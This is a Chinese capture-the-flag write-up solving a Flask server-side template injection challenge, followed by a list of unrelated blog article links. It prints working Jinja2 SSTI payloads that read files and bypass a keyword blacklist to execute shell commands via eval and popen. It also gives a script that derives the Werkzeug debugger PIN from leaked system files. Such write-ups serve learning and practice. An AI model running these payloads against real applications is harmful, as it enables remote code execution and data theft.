Flask+SSTI的新火花

记一次buu刷题记和回顾祥云杯被虐出屎的经历。题目:[GYCTF2020]FlaskApp

一 题目初见

朴实无华的页面,一个base64的小程序页面

看到有提示。

我就想到了可能是flask的失败报错界面和pin码的获取(来源祥云杯的虐后感)

二 开始解题

看到这里就不用多解释了,输入一个非法的字符串会自动跳转到这里,我们接着思路,可以在这里查看源码。

可以看到是将解密之后的字符串直接输出到页面上,不用说SSTI安排上。

触发了waf。大概流程就是,在加密页面将注入的内容变成base64,再解密的解密进行解密。至于waf嘛,没有源代码,只能一个一个的尝试。注意python是3.8.7的版本。

{% for c in [].__class__.__base__.__subclasses__() %}{% if c.__name__=='catch_warnings' %}{{ c.__init__.__globals__['__builtins__'].open('app.py','r').read() }}{% endif %}{% endfor %}

这里借用答案的一个payload,直接进行读取文件。看到waf函数

def waf(str):
black_list = ["flag","os","system","popen","import","eval","chr","request",
"subprocess","commands","socket","hex","base64","*","?"]
for x in black_list :
if x in str.lower() :
return 1

一看凉了,没有命令执行了。当然不可能不可以命令执行的,python可是最骚的语言。

{% for c in [].__class__.__base__.__subclasses__() %}{% if c.__name__=='catch_warnings' %}{{ c.__init__.__globals__['__builtins__'].open('app.py','r').read() }}{% endif %}{% endfor %}

只有进行文件读取,但是flag这个文件不知道文件名字,就只能采取获取pin码在这里进行任意python代码执行。

要生成pin码,我们需要以下几个信息

(1)flask所登录的用户名。可以通过读取/etc/password知道 用户为flaskweb
(2) modname 一般不变就是flask.app
(3)getattr(app, “name”, app.class.name)。python该值一般为Flask ,值一般不变
(4)flask库下app.py的绝对路径。在报错信息中可以获取此值为: /usr/local/lib/python3.7/site-packages/flask/app.py
(5)当前网络的mac地址的十进制数。通过文件/sys/class/net/eth0/address读取。
(6)docker机器id对于非docker机每一个机器都会有自已唯一的id,linux的id一般存放在/etc/machine-id或/proc/sys/kernel/random/boot_i,有的系统没有这两个文件。对于docker机则读取/proc/self/cgroup,其中第一行的/docker/字符串后面的内容作为机器的id,

payload就自己构造吧,放上收藏已久的秘密小脚本跑就行了。

import hashlib
from itertools import chain
probably_public_bits = [
'flaskweb'# username
'flask.app',# modname
'Flask',# getattr(app, '__name__', getattr(app.__class__, '__name__'))
'/usr/local/lib/python3.7/site-packages/flask/app.py' # getattr(mod, '__file__', None),
] private_bits = [
'2485410388611',# str(uuid.getnode()), /sys/class/net/ens33/address
'310e09efcc43ceb10e426a0ffc99add5c651575fe93627e6019400d4520272ed'# get_machine_id(), /etc/machine-id
] h = hashlib.md5()
for bit in chain(probably_public_bits, private_bits):
if not bit:
continue
if isinstance(bit, str):
bit = bit.encode('utf-8')
h.update(bit)
h.update(b'cookiesalt') cookie_name = '__wzd' + h.hexdigest()[:20] num = None
if num is None:
h.update(b'pinsalt')
num = ('%09d' % int(h.hexdigest(), 16))[:9] rv =None
if rv is None:
for group_size in 5, 4, 3:
if len(num) % group_size == 0:
rv = '-'.join(num[x:x + group_size].rjust(group_size, '0')
for x in range(0, len(num), group_size))
break
else:
rv = num print(rv)

题目完结。

三 非预期解

首先我们可以看到这个waf实在是太废物了,等于没有。字符串拼接的方法,字符串倒置的方法都可以对他进行绕过,辣鸡。

{% for c in [].__class__.__base__.__subclasses__() %}{% if c.__name__=='catch_warnings' %}{{ c.__init__.__globals__['__builtins__'].open('txt.galf_eht_si_siht/'[::-1],'r').read() }}{% endif %}{% endfor %}

{% for c in [].__class__.__base__.__subclasses__() %} {% if c.__name__ == 'catch_warnings' %}   {% for b in c.__init__.__globals__.values() %}   {% if b.__class__ == {}.__class__ %}     {% if 'eva'+'l' in b.keys() %}       {{ b['eva'+'l']('__impor'+'t__'+'("o'+'s")'+'.pope'+'n'+'("cat /this_is_the_fl'+'ag.txt").read()') }}     {% endif %}   {% endif %}   {% endfor %} {% endif %} {% endfor %}

最新文章

  1. "过期不候"--具备生命周期的数据的技术实现方案
  2. Sql Server xml 类型字段的增删改查
  3. QtSpim实现MIPS指令的编写
  4. 关于MVC中使用dynamic
  5. php foreach 使用&(与运算符)引用赋值要注意的问题
  6. servlet上传文件报错(一)
  7. .net core2 发送电子邮件封装
  8. python复杂网络库networkx:算法
  9. java实现多个文件以压缩包导出到本地
  10. 解决response.setHeader("Content-disposition" 中文乱码问题
  11. 亚马逊商品页面的简单爬取 --Pyhon网络爬虫与信息获取
  12. Rehash死锁的问题
  13. redis 数据类型为set命令整理以及示例
  14. SQL记录-PLSQL-EXIT/CONTINUE/GOTO
  15. UnicodeDecodeError: 'utf-8' codec can't decode byte
  16. Redis--初入
  17. UNITY引擎变量调用产生不必要内存分配
  18. 多版本python如何切换
  19. python3----函数、匿名函数
  20. Android学习笔记_53_Android界面的基本属性

热门文章

  1. 二、利用Git将GitHub上的项目拉下项目
  2. masterha_check_repl --conf=/etc/mha/app1.cnf检查错误
  3. JavaSE25-Junit&注解
  4. css做keylogger
  5. 我用 go-zero 一周实现了一个中台系统,已开源!
  6. 用Wireshark对Android应用的网络流量进行抓包
  7. Blogs添加横幅滚动条
  8. NPOI导入excel
  9. flowable 实现多实例-会签-动态配置人员 参考demo
  10. js实现页面消息滚动效果